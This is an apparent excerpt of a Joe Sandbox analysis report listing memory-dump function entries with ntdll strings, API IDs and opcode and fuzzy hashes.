                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-964947082
                                                          • Opcode ID: 302f97cb3e2c51a9bb23d7a6c37cf673230a0af9b74b9bc24bbfdecee309b91b
                                                          • Instruction ID: 03cb249a4095a7998fe3ce878e2f9d08dff2dcf85af8914b2bda703a51e0a9f2
                                                          • Opcode Fuzzy Hash: 302f97cb3e2c51a9bb23d7a6c37cf673230a0af9b74b9bc24bbfdecee309b91b
                                                          • Instruction Fuzzy Hash: 0E4106B5615358DFD710CF58D880F6ABBF9FF08394F01C05AEA069B241CA30DA49DBA0
                                                          Strings
                                                          • Actx , xrefs: 359533AC
                                                          • RtlCreateActivationContext, xrefs: 359929F9
                                                          • SXS: %s() passed the empty activation context data, xrefs: 359929FE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                          • API String ID: 0-859632880
                                                          • Opcode ID: aa36b0624f4186cb6cabe7b6a1a5689b90911b28f2e10e6512ceaba2de339852
                                                          • Instruction ID: cd16a356117ece585d9ae5a0af3ac4b2c33530d67ec0c6a6073be2c9dbb4b658
                                                          • Opcode Fuzzy Hash: aa36b0624f4186cb6cabe7b6a1a5689b90911b28f2e10e6512ceaba2de339852
                                                          • Instruction Fuzzy Hash: 033101736113059FEB16CE69D880B9A37A9FB48720F518869ED059F282CB70E855CB90
                                                          Strings
                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 359AB632
                                                          • @, xrefs: 359AB670
                                                          • GlobalFlag, xrefs: 359AB68F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                          • API String ID: 0-4192008846
                                                          • Opcode ID: 8090fe15918dd8e1831d60ac56e49dfb2cb3eab7e8643490997c1c1292500853
                                                          • Instruction ID: 00251aa4f3b693532fdadf3dd0304110acbf3e1bfb933f72e38a96a56cf0c09e
                                                          • Opcode Fuzzy Hash: 8090fe15918dd8e1831d60ac56e49dfb2cb3eab7e8643490997c1c1292500853
                                                          • Instruction Fuzzy Hash: AC315AB6E00219AFDB01DFA4DC80AEEBBBDEF44754F500469EA05A7151D774AA04CBA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                          • API String ID: 0-1050206962
                                                          • Opcode ID: 6c25ff32682aec05d605e195772155f472eb19d6f0c96043971f133965661d88
                                                          • Instruction ID: 5d7daf9a325616b80050db371700b21a71f5660508ed369d21efdae882a1367a
                                                          • Opcode Fuzzy Hash: 6c25ff32682aec05d605e195772155f472eb19d6f0c96043971f133965661d88
                                                          • Instruction Fuzzy Hash: 8D318E72E00659BFDB12DF94CC84EAEBBBDEB44754F4144E5EA00A7211D738DD089BA1
                                                          Strings
                                                          • LdrpInitializeTls, xrefs: 35991A47
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35991A51
                                                          • DLL "%wZ" has TLS information at %p, xrefs: 35991A40
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-931879808
                                                          • Opcode ID: 12a2c387cc3ebfa46861d8f815f4df91a8b6804083b21ea7f600f6674f8f3509
                                                          • Instruction ID: ec3f9edbc519d4b120071a45b5c7ecfcac73870188feeea888a295e1c1d6dd54
                                                          • Opcode Fuzzy Hash: 12a2c387cc3ebfa46861d8f815f4df91a8b6804083b21ea7f600f6674f8f3509
                                                          • Instruction Fuzzy Hash: 7031F871A12341ABEB14CF48C845F9A737DFB483A4F050959E940B7290DB70BE56ABA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: RtlValidateHeap
                                                          • API String ID: 3446177414-1797218451
                                                          • Opcode ID: c099ca8de017913150ecbe840bdf9f1eedbffe75b789a84d6ef52e9b1ee038cc
                                                          • Instruction ID: 3484667fc32c051df038a732c330ef66ef0a0fcd13f2dc4ddc391ecd1d7b6a6a
                                                          • Opcode Fuzzy Hash: c099ca8de017913150ecbe840bdf9f1eedbffe75b789a84d6ef52e9b1ee038cc
                                                          • Instruction Fuzzy Hash: 66412C76B0535ADFDB02CF64C8907ADBBB6BF45350F04825ADC5257281CB35AA01DBD0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: kLsE
                                                          • API String ID: 3446177414-3058123920
                                                          • Opcode ID: e466920747e8475eed49b3f1a5836855926898062f84291fa98dedbbaccfe041
                                                          • Instruction ID: 1541b5973ed5d642b37f5ba817cf70805f73d3d74476bd21932b31f63baa4fef
                                                          • Opcode Fuzzy Hash: e466920747e8475eed49b3f1a5836855926898062f84291fa98dedbbaccfe041
                                                          • Instruction Fuzzy Hash: AB4126B16253514BE711DB68ED84B6D3BA8B704764F11019DEC62AB0C2CF641683D7E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@
                                                          • API String ID: 0-149943524
                                                          • Opcode ID: 0f90a6d90085615ca649d1ba4eadd9f5732b7e1ca5c145c90b25c5aa6b9b342f
                                                          • Instruction ID: f752f9c4016d84303bf264f555952dbd483b7e5baed5e200341c6c61fb37a86e
                                                          • Opcode Fuzzy Hash: 0f90a6d90085615ca649d1ba4eadd9f5732b7e1ca5c145c90b25c5aa6b9b342f
                                                          • Instruction Fuzzy Hash: 323279B8609351CBD725CF14C481B2AB7FAFF88744F50492EE9869B2A0E774D944CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 16249c75911a06a50747434db926282e060b82206a1345d5c93a8b9771906d45
                                                          • Instruction ID: 490a5b6598b91765aaad39b30e034b123eec0d4b8dacacb828587c2fcac81473
                                                          • Opcode Fuzzy Hash: 16249c75911a06a50747434db926282e060b82206a1345d5c93a8b9771906d45
                                                          • Instruction Fuzzy Hash: 5B31CB35341B0AEFE755CB24CA80E8ABBBABF48344F040025E9059BA55DBB4F821CBD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$
                                                          • API String ID: 3446177414-233714265
                                                          • Opcode ID: aa54ddad9e6abcaf57ea47f7f7cda0df84973e0834861753b7ff3f409e9bd28b
                                                          • Instruction ID: cbae04b0290cf52295887b5e812b498ab27b6fa21303c5654cd5f2fddbdbc52b
                                                          • Opcode Fuzzy Hash: aa54ddad9e6abcaf57ea47f7f7cda0df84973e0834861753b7ff3f409e9bd28b
                                                          • Instruction Fuzzy Hash: 6461DD75A06749DFEB20CFA4C582B9DBBB6FF48304F104069D51AAB641DB7CB985CB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                          • API String ID: 0-118005554
                                                          • Opcode ID: 9b76c719f12643daad5b2c0502bd847e0292e6814b4f22e9a09f2c7d363c2a53
                                                          • Instruction ID: c6dae83a5de16e3391ebb2435bbddcf4668cc7ac20d6dc80ea03d5fe4f705f78
                                                          • Opcode Fuzzy Hash: 9b76c719f12643daad5b2c0502bd847e0292e6814b4f22e9a09f2c7d363c2a53
                                                          • Instruction Fuzzy Hash: 5A31ED76209741DBE701CB69E846B1AB3E8FF8D750F040869F854CB391EBB4E905CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local\$@
                                                          • API String ID: 0-380025441
                                                          • Opcode ID: 6621fbe5e49e913c2e46b3977ff1981f44375e8915fe1c9b91fb7eec3d80dd60
                                                          • Instruction ID: c9ec07966049b3d0b687512856c79b96d63322cf11cf0ebe4dc7ec7f9d3231a9
                                                          • Opcode Fuzzy Hash: 6621fbe5e49e913c2e46b3977ff1981f44375e8915fe1c9b91fb7eec3d80dd60
                                                          • Instruction Fuzzy Hash: 7031A476509304DFD311CF28C580A5BBBF8FB896A4F80092EF99487210DB34DD18CB92
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 35992A95
                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 35992A90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                          • API String ID: 0-2653619699
                                                          • Opcode ID: c6829518e11877850c367eca5c226465c96b93e242cc3f5cf9f4fe1c70266eb4
                                                          • Instruction ID: 3a62ab8090f6b6c11491f3e1018ccb0db74679789728a66b37dba807d2835365
                                                          • Opcode Fuzzy Hash: c6829518e11877850c367eca5c226465c96b93e242cc3f5cf9f4fe1c70266eb4
                                                          • Instruction Fuzzy Hash: E2112C76B05204FBFB26CF488D41F9F77ADAB88B64F1584697904DB280D674DD0086A0
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 359F3356
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID:
                                                          • API String ID: 4062629308-0
                                                          • Opcode ID: d308c7d170b379523f29a01ada1946bdb5473573d6948e0f41734667f78e9123
                                                          • Instruction ID: 5c8582a0ef2f325d297dab3593ee09de9ef76f8c83184a68dde71b4f1b26e3f9
                                                          • Opcode Fuzzy Hash: d308c7d170b379523f29a01ada1946bdb5473573d6948e0f41734667f78e9123
                                                          • Instruction Fuzzy Hash: 90C124B99017198FDB20CF1AC884699FBF5FF88315F5081AED54EA7250D779AA81CF40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1766c72f6afa6d3d41ca1c3b069dee6dbbf7908562ba01f3ce4b09234fae9676
                                                          • Instruction ID: d0c1b6ddb382eab36769a3766e57fefa03f58e0af127dde9a16f63b8760d8b57
                                                          • Opcode Fuzzy Hash: 1766c72f6afa6d3d41ca1c3b069dee6dbbf7908562ba01f3ce4b09234fae9676
                                                          • Instruction Fuzzy Hash: 16B100B56093808FD354CF28C580A6ABBF1BF88304F544A6EF899DB352D771E945CB82
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fa1eeea6a7587d9bab5f8c68491c1431d9e620cb982c977d501028b1f67a9e0
                                                          • Instruction ID: 8e72123341a6c737397b77b2f0e68a636dbba616442a416a75498d75f03fbe10
                                                          • Opcode Fuzzy Hash: 2fa1eeea6a7587d9bab5f8c68491c1431d9e620cb982c977d501028b1f67a9e0
                                                          • Instruction Fuzzy Hash: D9A14775608346CFD310CF28D880A1ABBFAFF88354F14496EE585AB355EB70E945CB92
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62f87c00c4696d439bd5c5a0accd2c5433e4886cb083a48cc4987d904929c41c
                                                          • Instruction ID: 1b8fe7f114c4fa27f4c6e901318d2685f9ce6472e47425c95bd59e083c92c7d1
                                                          • Opcode Fuzzy Hash: 62f87c00c4696d439bd5c5a0accd2c5433e4886cb083a48cc4987d904929c41c
                                                          • Instruction Fuzzy Hash: 08614375B05609EFDB08CF68C880A9DFBB6BF88240F14816AD419A7305DB74BA45CBD0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c01b2e973eb8b5bab2d04d9263c503649955b4f3a6be65a3c39232692c9ba330
                                                          • Instruction ID: a2cae423d42c2fd025919af63ddd5f14f28f04e8ca703f74c991c9389c5ef758
                                                          • Opcode Fuzzy Hash: c01b2e973eb8b5bab2d04d9263c503649955b4f3a6be65a3c39232692c9ba330
                                                          • Instruction Fuzzy Hash: 2D412DB4D11388DFDB10CFA9C480AADBBF8FB48350F50456ED859A7211DB309A55DF60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 6a2906483af9810bd4cc89ab9ed8853ea74c6e6b472a2a3b2890311253f2d0ac
                                                          • Instruction ID: e276aa9cf003ad8977a8c887c1500af3e18405c83b290bac73bb04f22ee38852
                                                          • Opcode Fuzzy Hash: 6a2906483af9810bd4cc89ab9ed8853ea74c6e6b472a2a3b2890311253f2d0ac
                                                          • Instruction Fuzzy Hash: 0131D176601318AFC711DF18C840A5A77BBBF493A0F548269ED559B2A1DB31EE42CBD0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 27b2de50c86253544a483eec608bc172ab02a59de54716d71188bb28ea84ca7a
                                                          • Instruction ID: 57b06b0d2924610e6801f52227074008eafe982745f8dcb853b1fe9b5c43f5e3
                                                          • Opcode Fuzzy Hash: 27b2de50c86253544a483eec608bc172ab02a59de54716d71188bb28ea84ca7a
                                                          • Instruction Fuzzy Hash: D9316936715A09FFE7558B24DA80E89BBB6FF48240F445025E8018BB51DB79F831CB80
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 16ddfd17bc598c5d06f52d39f500aa20923b49e378c83795bd5117202ffac3d1
                                                          • Instruction ID: bced80c5e7023ce19ab242f9bf423ef83e649a6d61de273cb66cec930c888295
                                                          • Opcode Fuzzy Hash: 16ddfd17bc598c5d06f52d39f500aa20923b49e378c83795bd5117202ffac3d1
                                                          • Instruction Fuzzy Hash: 4421313520A3589FDB218F04C985F5ABBBEFF88B10F414568EC414BA59CB70E904CBC1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 3b76a83cdfbbf6c2b65c4002fee7647f01f2280502dd7952d8547569602ad9eb
                                                          • Instruction ID: 6e1485a32078afa614007bc2ae2b3435960679b55a355fddf18b0d35238c4359
                                                          • Opcode Fuzzy Hash: 3b76a83cdfbbf6c2b65c4002fee7647f01f2280502dd7952d8547569602ad9eb
                                                          • Instruction Fuzzy Hash: 1CF0F032204344AFD7319B09CC08F8ABBFDEF84B40F180118E94293091C6A0BA06C650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction ID: 10bdf30d3017b70dcbfac6298eea74ac2958e7b03654acd23c28fcc9cba1beb3
                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction Fuzzy Hash: 99617AB5D0521DAFEF11CFA5C840B9EBBB8FF84754F144129E811BB294D7789A44CBA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction ID: 29f70b2564b3438cf2a0bad4ce9124458bb84ff2432f20b14aa202f962899834
                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction Fuzzy Hash: FE517CB6619705AFE7218F54C840F5AB7ECFF84794F400929B9819B290E7B4ED08CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
